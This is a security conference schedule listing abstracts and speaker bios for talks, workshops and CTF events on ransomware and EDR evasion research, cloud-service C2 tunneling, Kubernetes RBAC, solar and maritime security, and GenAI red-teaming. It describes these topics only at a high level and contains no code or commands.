In the ever-evolving world of cybersecurity, attackers are one step ahead. But what happens when defenders rely on tools that attackers already know how to bypass? In this session, we dive deep into the mindset of adversaries and explore how modern Endpoint Detection and Response (EDR) systems are not the impenetrable fortress many think they are. As a defense researcher specializing in adversarial behavior, I’ve crafted a cross-platform ransomware (Windows, macOS, Linux) to understand the gaps in current defense mechanisms—not to cause harm, but to reveal how attackers think, act, and effortlessly slip past advanced defenses.
Through a live Proof of Concept (PoC) and in-depth technical walkthroughs, we’ll uncover the persistent techniques, evasion strategies, and overlooked system behaviors that let ransomware thrive even in well-defended environments. This talk isn’t meant to alarm—it’s an honest, reality-driven exploration of how attackers exploit EDRs, and more importantly, how defenders can bolster their security strategies.
If you work in blue team operations, threat hunting, or product security, expect to leave with a series of challenging questions rather than comforting answers.
I. Ransomware: Beyond Encryption
Evolving Objectives: Extortion, Persistence, and Disruption When Persistence is the Key to Success, Not the Payload
II. Mastering Persistence Across Platforms
macOS: LaunchAgents as a Stealthy Tool Windows: Registry Hijacking and Scheduled Tasks Linux: Cron Jobs, the Silent Worker
III. Building the Payload: Python and Java in Offensive Security
Quick Deployment: Why high-level languages dominate the attack surface Modular and Adaptable: Flexibility over complexity for real-world attacks
IV. How EDRs Actually Work: A Deep Dive
Detection Techniques: Behavioral analysis, memory scanning The Silent Failures: Weak telemetry collection and blind spots Evasion Patterns: From PoCs to real-world attacks
V. EDR Bypass: Simple Yet Effective Techniques
Signature Evasion: Breaking through with minor tweaks Demonstration: How different commercial EDRs can be bypassed effortlessly
VI. Theory Meets Reality: Lessons Learned from PoCs
Real-World PoCs: Demonstrating how defenses fail against basic, effective tactics Undetected Persistence: How attackers use legitimate tools and strategies to evade detection, even in heavily secured environments The Gap: Why static detection and behavioral analysis don’t always mesh—and how attackers exploit this vulnerability
VII. Final Thoughts: Turning Offensive Knowledge into Defensive Strength
Adopting the Attacker’s Perspective: Understanding offensive techniques to fortify defenses Realism Over Optimism: Building adaptable, resilient security strategies with limited resources A Call to Action: Defend with pragmatism—recognize the attackers’ mindset to create proactive defenses
SpeakerBio: Zoziel FreireI have been working with Information Technology for over 16 years. I worked for a long time as a consultant, providing services to several companies in different segments in Brazil and other countries.
During my career, I acquired vast experience in Incident Response, Forensic Analysis, Threat Hunting, Malware Analysis and Malicious Document Analysis. I worked sharing knowledge as OWASP Chapter Leader - Vitória.
I have some certifications in Information Security. I am passionate about malware development and analysis and forensic investigation.
I have worked with Ransomware Incidents in Brazil and other countries. I am a speaker at events on Hacking and Information Security, Malware Analysis and Information Security Awareness.
- ics Calendar file
This talk revisits Google Calendar RAT (GCR), a proof-of-concept released in 2023 by the speaker, demonstrating how Google Calendar can be abused for stealthy Command&Control (C2) communication. A similar technique was recently observed in the wild, used by the APT41 threat group during a real-world campaign, which highlights the growing interest in abusing trusted cloud services for covert operations.
Building on that concept, the talk introduces a new Golang-based tool that enables SOCKS tunneling over Google services, establishing covert data channels.
The session explores how common cloud platforms can be repurposed to support discreet traffic forwarding and evade traditional network monitoring. While some familiarity with tunneling and cloud services may be helpful, the talk is designed to be accessible and will walk attendees through all key concepts.
Whether you're a penetration tester, red teamer, or simply curious about creative abuse of cloud infrastructure, you’ll leave with fresh ideas and practical insights.
References:
SpeakerBio: Valerio "MrSaighnal" AlessandroniValerio "MrSaighnal" Alessandroni is a seasoned offensive security professional with a lifelong passion for hacking. A former member of the Italian Army’s cyber units, he now leads EY Italy’s Offensive Security team, focusing on advanced red teaming and threat emulation.
He’s behind open-source tools like Google Calendar RAT (GCR) and he holds certifications including OSCP, OSEP, OSWE, OSWP, CRTO, eWPTX, eCPTX and more.
His bug bounty research has earned recognition from Microsoft, NASA, Harvard, and others. Off the keyboard, he rolls on the mat in Brazilian Jiu Jitsu and dreams of space exploration.
- ics Calendar file
Rayhunter is an open source project from EFF to detect IMSI catchers. In this follow up to our main stage talk about the project we will take a deep dive into the internals of Rayhunter. We will talk about the architecture of the project, what we have gained by using Rust, porting to other devices, how to jailbreak new devices, the design of our detection heuristics, open source shenanigans, and how we analyze files sent to us. It's everything you didn't know you wanted to know about Rayhunter.
Speakers:oopsbagel,Cooper "CyberTiger" Quintinoopsbagel is not a bagel but may be eating one while you read this. oops loves contributing to open source software, running wireshark, reversing, hardware hacking, breaking Kubernetes, and floaking.
SpeakerBio: Cooper "CyberTiger" Quintin, Senior Staff Technologist at EFFCooper Quintin is a senior public interest technologist with the EFF Threat Lab. He has given talks about security research at prestigious security conferences including Black Hat, DEFCON, Shmoocon, and ReCon about issues ranging from IMSI Catcher detection to Femtech privacy issues to newly discovered APTs. He has two children and is very tired.
Cooper has many years of security research experience on tools of surveillance used by government agencies.
- ics Calendar file
Role-Based Access Control (RBAC) is the final layer of defense between a compromised Kubernetes workload and a full-scale cluster breach. Yet real-world RBAC configurations, especially those shipped by popular open-source operators and Helm charts, are rarely reviewed with an adversarial mindset.x000D x000D In this talk I introduce RBAC ATLAS, a curated index of identities and RBAC policies found in popular Kubernetes projects. Powered by rbac-scope, a purpose-built static analyzer I created, RBAC ATLAS enriches each policy with security annotations highlighting granted permissions, over-privileged resources, lateral-movement pivots and abuse primitives.x000D x000D The talk begins with a concise RBAC 101, explaining the common misconfigurations that transform a supposedly “least-privilege” setup into de facto cluster-wide root. We will then pivot to thinking like the adversary, demonstrating how attackers chain cluster-role impersonation, secret exfiltration, and CRD-based privilege-escalation techniques to gain lateral movement. Next, we will open the hood on rbac-scope, showing how its analysis pipeline and scraping workflows automatically surface risky policies. Finally, We will discuss key findings—calling out the riskiest projects I analyzed, the permission patterns distilled from analyzing over 100 policy objects, and concrete ways attackers and defenders can feed these insights into their daily security operations.
SpeakerBio: Lenin Alevski, Security Engineer at GoogleLenin Alevski is a Full Stack Engineer and generalist with a lot of passion for Information Security. Currently working as a Security Engineer at Google. Lenin specializes in building and maintaining Distributed Systems, Application Security and Cloud Security in general. Lenin loves to play CTFs, contributing to open-source and writing about security and privacy on his personal blog https://www.alevsk.com.
- ics Calendar file
(DCNextGen is for youth 8-18 attending DEF CON) Panel - Hacker stories and career Q and A: Stories and adventures from real life hacking engagements. Ask the panel about different career’s in cyber security and getting paid to be a hacker.
- ics Calendar file
Residential solar promises energy independence, but behind the panels lies a chaotic mess of insecure firmware, exposed APIs, and rebadged devices phoning home to mystery servers. This talk exposes how today's solar microgrids can be hijacked through unauthenticated cloud APIs, unsigned firmware updates, hardcoded root credentials, and even vendor-enabled kill switches. No custom exploits. No insider access. Just publicly documented APIs, leaked serial numbers, and a shocking lack of basic security controls.
We will walk through real-world attacks, account takeover via brute-forced PINs, remote access to power dashboards with zero authentication, firmware tampering for persistent implants, and replay attacks against plaintext MODBUS traffic. Our research reveals how vulnerabilities silently propagate across cloned OEMs and shared cloud infrastructure, turning a single bug into an industry-wide risk. If you thought solar made you off-grid, this talk will change your threat model.
References:
Speakers:Anthony "Coin" Rose,Jake "Hubble" KrasnovDr. Anthony "Coin" Rose is the Director of Security Research and Chief Operating Officer at BC Security, as well as a professor at the Air Force Institute of Technology, where he serves as an officer in the United States Air Force. His doctorate in Electrical Engineering focused on building cyber defenses using machine learning and graph theory. Anthony specializes in adversary tactic emulation planning, Red and Blue Team operations, and embedded systems security. Anthony has presented at security conferences, including Black Hat, DEF CON, HackMiami, RSA, HackSpaceCon, Texas Cyber Summit, and HackRedCon. He also leads the development of offensive security tools, including Empire and Moriarty.
SpeakerBio: Jake "Hubble" Krasnov, Red Team Operations Lead and Chief Executive Officer at BC SecurityJake "Hubble" Krasnov is the Red Team Operations Lead and Chief Executive Officer of BC Security, with a distinguished career spanning engineering and cybersecurity. A U.S. Air Force veteran, Jake began his career as an Astronautical Engineer, overseeing rocket modifications, leading test and evaluation efforts for the F-22, and conducting red team operations with the 57th Information Aggressors. He later served as a Senior Manager at Boeing Phantom Works, where he focused on aviation and space defense projects. A seasoned speaker and trainer, Jake has presented at conferences including DEF CON, Black Hat, HackRedCon, HackSpaceCon, and HackMiami.
- ics Calendar file
As cryptographic algorithms evolve and new vulnerabilities emerge, traditional Hardware Security Modules (HSMs) face a critical limitation: their rigidity. This talk introduces a novel approach to hardware-based security using reconfigurable HSMs built on FPGA technology. Unlike fixed-function HSMs, reconfigurable HSMs can be updated post-deployment, allowing organizations to adapt to cryptographic breakthroughs or deprecations without replacing hardware.
SpeakerBio: Pablo Trujillo, Founder at ControlPaths Eng.Pablo has been an FPGA designer for over 10 years, specializing in digital signal processing and control algorithms, with a strong focus on their implementation in FPGA-based systems. He is the founder of ControlPaths Eng., a consultancy dedicated to electronic design and FPGA development. In addition to his professional work, Pablo authors the blog controlpaths.com, where he regularly publishes articles on FPGAs, SoCs, and hardware acceleration.
Pablo es diseñador de FPGA con más de 10 años de experiencia. Está especializado en procesado digital de señal e implementación de algoritmos de control sobre FPGA. Además de su trabajo, escribe regularmente en el blog controlpaths.com, donde investiga y publica artículos sobre procesado digital de señal en FPGA, y aceleración HW. Ha sido ponente en algunas charlas en España y Europa como AsturconTech (Asturias), Vicon (Vigo) o Embedded World (Nuremberg).
- ics Calendar file
Step into the world of Industrial Control System (ICS) security with Red Alert ICS CTF, a competition built by hackers, for hackers. Hosted by the RedAlert Lab of NSHC Security, this contest is all about pushing the limits—breaking through layers of security in a real Operational Technology (OT) environment until you seize full control of ICS components.
Since its debut at DEF CON 26, Red Alert ICS CTF has been a must-attend event, growing bigger and tougher each year. Now recognized as a Black Badge contest at DEF CON 32, DEF CON 31, and DEF CON 26, it’s the ultimate proving ground for those who thrive in the high-stakes world of ICS hacking.
What makes this CTF unique? Live ICS hardware from top industry vendors, simulating real-world critical infrastructure. Participants will interact with actual devices, manipulate industrial processes, and exploit vulnerabilities in real time. This isn’t just another CTF—this is a full-scale ICS cyber battleground.
Are you ready to test your skills, outsmart industrial defenses, and dominate the ICS arena? The challenge awaits.
Bring your laptop and a network adapter (if your laptop lacks one). Refresh your knowledge of ICS protocols and processes to stay ahead in the competition.
Any specialized hardware required will be provided by the contest organizers.
No
- ics Calendar file
Cyber Security threats encountered in the Maritime Industry from both an Executive and Technical Perspective. The presentation is based on current events and starts with the Executive Director of The Marine Exchange of Southern California giving his side of the story followed by the technical and first-hand incident response breakdown from the Senior Systems Administrator.
Speakers:Capt. Kit Louttit,Steve WinstonCaptain Kip Louttit was appointed as the Executive Director of the Marine Exchange of Southern California in January 2013. A graduate of the United States Coast Guard Academy, he served in the United States Coast Guard (USCG) for 30 years prior to retiring with the rank of Captain. Captain Louttit’s experience includes 10 years at sea in the Atlantic and Pacific Oceans and the Bering, Mediterranean, and Caribbean Seas. He had six years in command of three different Coast Guard cutters and two years as commanding officer of USCG Integrated Support Command in San Pedro. Following retirement from the Coast Guard, Captain Louttit worked for two consulting firms on Coast Guard and Pentagon work.
SpeakerBio: Steve Winston, Mastermind MSPSenior Systems Administrator and CASP-certified cybersecurity professional with over 9 years of experience supporting a broad spectrum of IT environments. Has worked with more than 30 organizations across finance, healthcare, manufacturing, and critical infrastructure, bringing a practitioner’s perspective to enterprise defense. Specializes in securing hybrid infrastructures, implementing proactive threat mitigation strategies, and translating complex security requirements into operationally sound solutions. Combines deep systems knowledge with an adversarial mindset to challenge assumptions and close real-world security gaps.
- ics Calendar file
The Red Team Capture the Flag (CTF) competition at DEF CON is a challenging and exciting event that tests the skills of participants in offensive security. The objective of the Red Team CTF is for teams to successfully complete challenges faced by Red Teams.
The Red Team CTF is designed to simulate real-world scenarios in which attackers attempt to penetrate the security of a network or system. Participants are expected to use a wide range of hacking techniques, tools, and skills to identify and exploit vulnerabilities in the target network.
Teams are typically composed of experienced hackers, penetration testers, and security researchers who have a deep understanding of the latest cybersecurity threats and attack techniques. They must work together to uncover and exploit vulnerabilities in the target network, while also evading detection and countermeasures put in place by the Blue Team.
The Red Team CTF at DEF CON is considered one of the most challenging and prestigious CTF competitions in the world, with participants coming from all over the globe to compete. It is a high-pressure, high-stakes event that tests the limits of participants' technical and strategic abilities, and offers a unique opportunity to showcase their skills and knowledge in front of a global audience of Hackers.
Participants are required to bring a laptop with the ability to connect to DEF CON WiFi or other internet connection.
There is no pre-qualifier for the event.
- ics Calendar file
Fraudsters are innovative and persistent, constantly trying out variations of attacks to breach fraud defenses. The advent of gen AI has made it easier for fraudsters to experiment. This talk will outline ways in which LLMs can be used to test the resilience of your fraud systems to fraudster attacks.
Speakers:Karthik Tadinada,Martyn HigsonKarthik is the founder and CEO of Fortify Solutions, a provider of fraud and financial crime prevention solutions. Karthik has over a dozen years of experience in building fraud prevention systems at international scale, having built systems for IATA, EFhe debit card network of Australia), TSYS and WorldPay.
SpeakerBio: Martyn Higson, CTO at Fincrime DynamicsMartyn is CTO at Fincrime Dynamics, a synthetic data company for prevention of fraud and financial crime. Martyn has been responsible for deploying major fraud prevention systems in his prior roles at Featurespace.
- ics Calendar file
The new space race is here and as space systems become more interconnected and commercially accessible, their attack surface expands, making them prime targets for cyber threats. Yet, most organizations developing and operating satellites rely on traditional security models, if at all, that do not account for the unique risks of space-based assets. This talk explores the emerging discipline of space red teaming, where offensive security techniques are applied to test and validate the security of satellites, ground stations, and their supporting infrastructure.
In this talk we explore the following:
Understanding the space attack surface: - A breakdown of key vulnerabilities in spacecraft, radio links, and ground control. - Tactics, Techniques, and Procedures (TTPs): How attackers might compromise a space asset, disrupt communications, or manipulate telemetry. - Defensive takeaways: How space operators can leverage red teaming to harden their architectures against real-world threats.
This presentation is ideal for penetration testers, security researchers, space engineers, and policy makers who want to understand the offensive side of space security. Whether you’re an experienced red teamer or just a space junky, this talk will provide practical insights into securing the next frontier.
SpeakerBio: Tim Fowler, ETHSO Labs
- ics Calendar file
With GenAI and LLM applications conquering the world at an unprecedented pace, the evolution of the new attack surface associated with these applications, puts a challenge to security practitioners in general, and specifically also for red-teams. GenAI security red-teaming can focus on three victim-objects; the LLM model itself, the prompt, and the entire application, with each of these having its own challenges and opportunities.
With a defender mindset, striving for utilization of red-teaming within the application development lifecycle in a manner that contributes to proactive security by providing actionable insights on fortifying the application, we will present a novel security approach, based on a triangle of tools: a) Threat-wise prompts red-teaming; b) Prompt hardening through prompt patching; c) Adversarially robust LLM that has high Security Steerability.
SpeakerBio: Itsik Mantin
- ics Calendar file
In this session we will showcase how you can leverage AI to build your terraform packages for your Red Team Workshop. Make sure to bring your laptops!
SpeakerBio: Moses FrostMoses Frost has been working in the field since the late 90's. Working with computers in the late 80s for fun and moving into a more professional field shortly after high school. He is a Red Team Operator at Neuvik. A senior instructor and course author at the SANS Institute, authoring and teaching the Cloud Penetration Testing Course. He also co-authors the book Gray Hat Hacking: Volume 6. He has worked at many companies, notably Cisco Systems, McAfee, and TLO. Currently, he is a Senior Operator at Neuvik. Over those years, he has enjoyed working in all parts of the IT Industry and hopes to do so for many more years.
- ics Calendar file
Referral Rewards Programs. Functionality that most probably view as boring and not worth the time looking at while hunting for bugs on a program. After a deep dive into the implementation of this functionality across dozens of programs, I found them to be hiding some very interesting bugs. My research uncovered various types of business logic flaws, race conditions, and even how the implementations created various client-side gadgets such as cookie-injection and client-side path traversal which could then be used as a part of a client-side chain. This research uncovered vulnerabilities in multiple large bug bounty programs.
SpeakerBio: Whit "un1tycyb3r" Taylor, Rhino Security LabsAs a penetration tester for Rhino Security Labs, I bring over a decade of experience to the security industry. For the past two years, I have specialized in bug bounty hunting and penetration testing, focusing on web applications and recently expanding into Android application security. My work has resulted in vulnerability submissions to major companies, including Epic Games and PayPal.
Beyond my primary roles, I actively conduct security research on open-source projects and emerging web technologies. This research has led to the discovery of several CVEs, including a critical Unauthenticated Remote Command Execution (RCE) vulnerability in Appsmith Enterprise Edition.
- ics Calendar file
Let's cut through the BS - if you're not using regex properly, you're leaving money on the table as a hacker. This workshop shows you how regex can crack open targets that automated tools miss.
We'll skip the boring theory and jump straight into the good stuff: how to use regex to find juicy endpoints, bypass filters, and automate your recon. You'll learn how actual hackers use regex to:
1 Hour. Hands on. Come hack!
Speakers:Ben "nahamsec" Sadeghipour,Adam "BuildHackSecure" LangleyBen Sadeghipour, better known as NahamSec, is an ethical hacker, content creator, and keynote speaker. Over his career, Ben has uncovered thousands of security vulnerabilities for major organizations, including Amazon, Apple, Zoom, Meta, Google, and the U.S. Department of Defense. As a top-ranked bug bounty hunter, he is deeply passionate about cybersecurity education, regularly sharing his knowledge through his popular YouTube channel and speaking at major conferences like DEFCON and BSides. Beyond his personal achievements, Ben is committed to building the security community, organizing events that foster collaboration, innovation, and the next generation of offensive security professionals.
SpeakerBio: Adam "BuildHackSecure" Langley, CTO at HackingHubFor over 20 years, Adam has balanced the worlds of application security and web development. He currently serves as the CTO of HackingHub and the Director of BSides Exeter. Over the past five years, he has combined his expertise to create and deliver gamified educational content, aimed at teaching the next generation of ethical hackers and developers about web application security.
- ics Calendar file
Regular Expressions or RegEX are used everywhere! If you aspire to be a Pentester, Threat Hunter, Programmer, Network Engineer, DevOps or really anything in technology today, RegEx is a skill all the greats have and the majority of the industry are terrible at. Come learn or brush up on your RegEx skills in on our live trainer.
- ics Calendar file
Choose your side!
Blue Team You are assigned to the Cybersecurity Team servicing four Regional Airports within the IG Labs Regional Airport System. The shift this evening started with routine checking status boards, reviewing threat alerts, and checking for any newly identified vulnerabilities that may have an impact on the system from both Information Technology (IT) and Operational Technology (OT) vectors.
Around midnight, chaos ensues! Runway lighting is turning off at your airport and others nearby, planes are circling waiting to land or diverting to other locations. You must regain access to your systems, find the problem, and restore operation to the Runway Lighting Control System quickly and ensure that the other regional airports your team is responsible for do not lose control of their systems and operations are able to continue without interruption.
Red Team(s) Cybersecurity Teams are often heavily focused on securing Information Technology (IT) systems and devices but may not consider securing Operational Technology (OT) systems and devices. While OT systems and devices may be connected to IT systems, the type of data and protocols are different.
You start your day exploring OT system vulnerabilities and consider what chaos you could create. You see a report that the runway lighting system at one of the IG Labs Regional Airports has been compromised. You start researching to learn more about the attack and the IG Labs Regional Airport System. Satisfied that you have learned enough to add to the madness that has been created at La Valoria, you decide to launch an attack of your own.
Success will be determined by the ability to disrupt the control and operations of the Runway Lighting Systems for the IG Labs Regional Airports at the OT level. DoS and DDoS attacks are not permitted as the intent is to demonstrate an understanding of OT systems, their functionality, and protocols.
- ics Calendar file
With the maritime industry handling a large portion of global trade, efficient, secure information transfer is essential. Technologies like unmanned aerial vehicles (UAVs), autonomous underwater vehicles (AUVs), and the Internet of Ships (IoS) are enhancing communication and operational efficiency, but they also pose security and network management challenges. Compromised IT systems can lead to easy access to operational technology (OT) networks, increasing the risk of zero-day attacks. This talk presents the current state of maritime comms and explore the feasibility of an SDN-SDR driven cross-layer framework using SATCOM infrastructure for a resilient and reconfigurable maritime comms in dynamic, resource-constrained environments.
SpeakerBio: AviNash Srinivasan, US Naval AcademyDr. Avinash Srinivasan is an Associate Professor in the Cyber Science department at the United States Naval Academy. He holds a Ph.D. and a Master's in Computer Science, and a Bachelor’s in Industrial Engineering. His research interests span the broad areas of cybersecurity and forensics. In particular, his research focuses on network security and forensics, security and forensics in cyber physical systems, and critical infrastructure, steganography and information hiding, cloud computing forensics challenges, and privacy and anonymity. Dr. Srinivasan has administered several grants from agencies including DoD/Navy, NSF, DoJ, DHS, and DoEd. He has published 55 papers in prestigious refereed conferences and journals including IEEE Transactions on Information Forensics and Security, INFOCOM, ICDCS, and ACM SAC. Dr. Srinivasan also holds a patent (Patent number: 11210396). He currently serves on the editorial board for IEEE Transactions on Cognitive Communications and Networking as an Associate Editor. Dr. Srinivasan is a Certified Ethical Hacker (CEH) and Computer Hacking Forensics Investigator (CHFI). He has trained civilians as well as local and state law enforcement personnel in the areas of Macintosh Forensics and Network Forensics.
- ics Calendar file
Through novel research our team uncovered a critical vulnerability in Azure's guest user model, revealing that guest users can create and own subscriptions in external tenants they've joined—even without explicit privileges. This capability, which is often overlooked by Azure administrators, allows attackers to exploit these subscriptions to expand their access, move laterally within resource tenants, and create stealthy backdoor identities in the Entra directory. Alarmingly, Microsoft has confirmed real-world attacks using this method, highlighting a significant gap in many Azure threat models. This talk will share the findings from this first of its kind research into this exploit found in the wild.
We'll dive into how subscriptions, intended to act as security boundaries, make it possible for any guest to create and control a subscription undermines this premise. We'll provide examples of attackers leveraging this pathway to exploit known attack vectors to escalate privileges and establish persistent access, a threat most Azure admins do not anticipate when inviting guest users. While Microsoft plans to introduce preventative options in the future, this gap leaves organizations exposed to risks they may not even realize exist––but should definitely know about!
SpeakerBio: Simon Maxwell-StewartSimon Maxwell-Stewart is a seasoned data scientist with over a decade of experience in big data environments and a passion for pushing the boundaries of analytics. A Physics graduate from the University of Oxford, Simon began his career tackling complex data challenges and has since built a track record of delivering impactful machine learning solutions across diverse industries.
Prior to joining BT, Simon served as a Lead Data Scientist in the healthcare sector, where he successfully brought several machine learning projects into production, transforming research insights into actionable tools. Currently, he leverages his expertise as the resident "graph nerd" in BT's Security Research team, exploring cutting-edge graph-based techniques to enhance network security and drive innovative approaches to threat detection.
Simon’s unique combination of technical depth and creative problem-solving has made him a key contributor to advancements in data science and security.
- ics Calendar file
Have a resume that needs to be reviewed? Come check out LHC Resume Reviews for our 2nd annual event where we will review your resume by people from LHC, OWASP, and WISP! Be the first 90 people in line to get a special poker chip to take home!
- ics Calendar file
RETINA is the very first retro video game built for reverse engineers. Do you want to start the analysis of that sample, but aren’t really in the mood? You can try RETINA for Commodore 64, which can be fully customized with your own sample so that during your game you will also perform the malware triage!
SpeakerBio: Cesare "Red5heep" PizziCesare is a security researcher, analyst, and technology enthusiast. He develops software and hardware and tries to share this with the community. Mainly focused on low-level programming, he developed a lot of open-source software, sometimes hardware related and sometimes not. He does a lot of reverse engineering too. He likes to share his work when possible at conferences like DEF CON, Insomni'hack, and Nullcon. He is a contributor to several open-source security projects including TinyTracer, Volatility, OpenCanary, PersistenceSniper, Speakeasy, and CETUS, and is a CTF player.
- ics Calendar file
RETINA is the very first retro video game built for reverse engineers. Do you want to start the analysis of that sample, but aren’t really in the mood? You can try RETINA for Commodore 64, which can be fully customized with your own sample so that during your game you will also perform the malware triage!
SpeakerBio: Cesare "Red5heep" PizziCesare is a security researcher, analyst, and technology enthusiast. He develops software and hardware and tries to share this with the community. Mainly focused on low-level programming, he developed a lot of open-source software, sometimes hardware related and sometimes not. He does a lot of reverse engineering too. He likes to share his work when possible at conferences like DEF CON, Insomni'hack, and Nullcon. He is a contributor to several open-source security projects including TinyTracer, Volatility, OpenCanary, PersistenceSniper, Speakeasy, and CETUS, and is a CTF player.
- ics Calendar file
Este panel reúne a expertos en seguridad ofensiva para discutir los principales desafíos que enfrentan los profesionales del Red Team en América Latina. Desde la falta de concientización empresarial hasta las barreras de formación y acceso a herramientas, los panelistas compartirán experiencias reales, estrategias y perspectivas sobre cómo avanzar en el ecosistema regional de ciberseguridad ofensiva.
Speakers:Yael Basurto,Giovanni Cruz Forero,Nico WaismanProfessional in Cybersecurity with 20 years of experience in the sector, seeks to share knowledge using his experience and knowledge and currently works as COO of 7 Way Security, organizer of BSides Colombia, La Villa and other spaces for building collective knowledge.
Profesional en Ciberseguridad con 17 años de experiencia en el sector, busca compartir conocimiento haciendo uso de su experiencia y conocimiento y en este momento trabaja como CEO de Be Hacker Pro donde plantea estrategias para el fortalecimiento del capital humano con talentos en ciberseguridad, es cofundador de CSIETE y 7 Way Security, organizador de BSides Colombia, HackLab Bogotá y otros espacios de construcción de conocimiento colectivo.
SpeakerBio: Nico Waisman, Head of Security - XBOW
- ics Calendar file
Rev.ng is an open source static binary analysis framework and interactive decompiler for native code based on LLVM and QEMU. In our demo we will: [1] Introduce rev.ng and how to use it from the command line. [2] Decompile a simple program to syntactically valid C code that can be fed into other static analysis tools. [3] Showcase our automated whole-program type recovery on a stripped program without debug symbols, able to detect complex types, e.g. linked-lists. [4] Demonstrate the Python scripting capabilities. [5] Demonstrate our preliminary integration with LLMs to assign names to functions, types, and so on. All the examples will be released on GitHub and 100% reproducible using only open source software.
Speakers:Pietro Fezzardi,Alessandro Di FedericoPietro is the CTO of rev.ng Labs, developing the rev.ng decompiler and reverse engineering framework. During his M.Sc. in mathematics, he started working on embedded systems programming. He received his PhD from Politecnico di Milano, working on automated bug-detection for high-level synthesis compilers for FPGA. He spent a short time at ARM in the research security group, working on fuzzing and static program analysis, before joining rev.ng. He is interested in program analysis, compilation, embedded systems programming, C++, free software, OpenStreetMap, juggling, and circus skills.
SpeakerBio: Alessandro Di FedericoAlessandro is the co-founder of rev.ng Labs. He obtained his PhD from Politecnico di Milano with a thesis about rev.ng and has been working on making a product out of it since then. He has been speaking at key industry and academic security conferences such as DEF CON, Recon, the USENIX Security Symposium, and others. He is passionate about compilers, C++, free software, reverse engineering, privacy, OpenStreetMap, hitchhiking, and hiking in the Alps.
- ics Calendar file
We all love security, right? And when we trust a security component to safeguard our most valuable assets such as passwords, key material and biometrics, we want to believe they're doing a good job at it. But what happens when this assumption is flawed, and the chip that was going to protect our assets turns against us?
In this talk we'll present the ReVault attack that targets the [REDACTED] chip embedded in over 100 different laptops models from [VENDOR]. We will demonstrate how a low privilege user can fully compromise the chip, plunder its secrets, gain persistence on its application firmware and even hack Windows back. Are you ready for the heist?
SpeakerBio: Philippe "phLaul" Laulheret, Senior Vulnerability Researcher at Cisco TalosPhilippe Laulheret is a Senior Vulnerability Researcher at Cisco Talos. With a focus on Reverse Engineering and Vulnerability Research, Philippe uses his background in Embedded Security and Software Engineering to poke at complex systems and get them to behave in interesting ways. Philippe presented multiple projects covering hardware hacking, reverse engineering and exploitation at DEF CON, Hardwear.io, Eko Party and more. In his spare time, Philippe enjoys playing CTFs, immersing himself in the beauty of the Pacific Northwest, and exploring the realm of Creative Coding. Philippe holds a MSc in Computer Science from Georgia Tech and a MSc in Electrical and Computer Engineering from Supélec (France).
- ics Calendar file
As the autonomous boat market has grown from nascent to ~$17 billion dollars, much of the infrastructure has gotten more and more accessible. Small flight controllers/autopilots are now only a click and configuration away. Servos, speed controllers and actuators have all seen wide adoption and open interfaces and standards. ArduPilot supports more control protocols in every release.
Marine engines and outboard motors have remained stubbornly hard to control, and what control systems do exist are closed-source black boxes. Few if any vendors are ever given the full ICD for engine control and the vendors are frequently litigious with 3rd party accessory shops. While the safety concerns about running large gasoline or diesel engines autonomously are well-founded, the manufacturer’s could be substantially more open and encourage collaborative work with partners and hackers.
This talk examines the current state of marine propulsion (outboard, inboard, steering, proprietary controls etc…), where marine propulsion is going (metaphorically!) and how to hack it! The reverse engineering can be as simple as read-the-manual and as complicated as having to buy a full engine setup. We will walk through a few specific examples from several vendors for several classes of vehicles from jet-skis to modern outboards. This talk showcases work that is currently in progress and would hugely benefit from the types of collaboration that occur at DefCon.
SpeakerBio: Alex LormanAlex was born and raised in Washington, D.C.
Eventually he attended the Catholic University of American and graduated with a B.S. in Architecture.
He has worked on complex oil and gas projects in addition to his work in salvage, providing him the insight that the maritime world needed robotics, badly.
In 2014 he co-founded Sea Machines and moved to the Boston area to spearhead the effort.
He enjoys playing with cars, ships, bicycles and anything with a mechanical or electrical heart.
- ics Calendar file
In this 2.5-hour hands-on workshop, participants will delve into the art of reverse engineering web applications to uncover hidden security flaws. Through guided exercises, attendees will learn to deconstruct application architectures and infrastructures, gaining insights into vulnerabilities, misconfigurations, and ways to make exploitation more reliable. Whether you're hunting for logic flaws, mapping unknown attack surfaces, or trying to make sense of a black-box app, this workshop equips you with practical strategies and mental models you can apply immediately.
The workshop includes guided mini-lessons, worksheets to reinforce key patterns, and a hands-on lab hosted remotely (or locally) where attendees apply their skills in real time. Support will be available throughout, and all materials (labs, notes, and tool recommendations) will be provided for continued practice after the session.
Speakers:Abraham De Leon Gutierrez,kuzushiHey, I'm Abraham. I'm from Mexico, currently finishing my degree in cybersecurity engineering and working as a penetration testing intern. What I like the most about cybersecurity is the community, always willing to share knowledge and help each other. I'm passionate about learning new things like music, hacking, tech, videogames and philosophy. I also enjoy meeting new people, taking on challenges like CTFs and sharing my knwoledge with others.
SpeakerBio: kuzushiAndrew Wilson (aka "kuzushi") is a seasoned application security expert, software architect, and international community builder with nearly two decades of experience across both offensive and defensive security.
Recognized as a Microsoft MVP in Azure and Developer Security from 2010–2015, Andrew has built and secured enterprise-scale systems, led one of the largest offensive security teams in the U.S., and personally conducted over 140+ web and application assessments.
Currently, Andrew is pursuing a PhD in offensive cybersecurity and AI, focusing on how mental models and context shape modern security analysis. He’s also an independent researcher, mentor, and frequent conference speaker, with past talks at defcon, ToorCon, AppSecDC, LASCON, and multiple BSides events nationwide.
- ics Calendar file
Presentation to kick off the Radio Frequency Village CTF with helpful tips for new folks.
SpeakerBio: RF Hackers
- ics Calendar file
- ics Calendar file
When exploring the dark web for OSINT or CTI investigations, you may be overwhelmed with numerous onion links, questionable marketplaces, and numerous search engines. With time constraints, how do you make sense of all this information and prioritize what truly matters? Enter Robin, an AI-powered dark web OSINT tool to streamline your investigations. Robin takes your query, automatically searches across multiple dark web search engines, scrapes relevant onion sites, and uses AI to generate clear, actionable investigative summaries. No more juggling five different tools or wasting hours validating dead links. In this tool demo, I’ll walk you through the real pain points of today’s dark web OSINT tools and show how Robin was built to solve them. I’ll cover the architecture, the scraping and summarization pipeline, and how Robin fits into real-world investigation workflows. I’ll also discuss future developments and how you can get involved. By the end of this talk, you will have a fresh perspective on dark web OSINT, a practical tool to use right away, and insights into how AI can simplify your dark web investigative process.
SpeakerBio: Apurv "ASG_Sc0rpi0n" Singh GautamApurv Singh Gautam is a Cybercrime Researcher working as a Sr. Threat Research Analyst at Cyble. He is focused on monitoring and analyzing wide spectrum of sources, creating automated tools, and performing threat investigations by utilizing HUMINT, SOCMINT, and OSINT and producing threat intelligence.
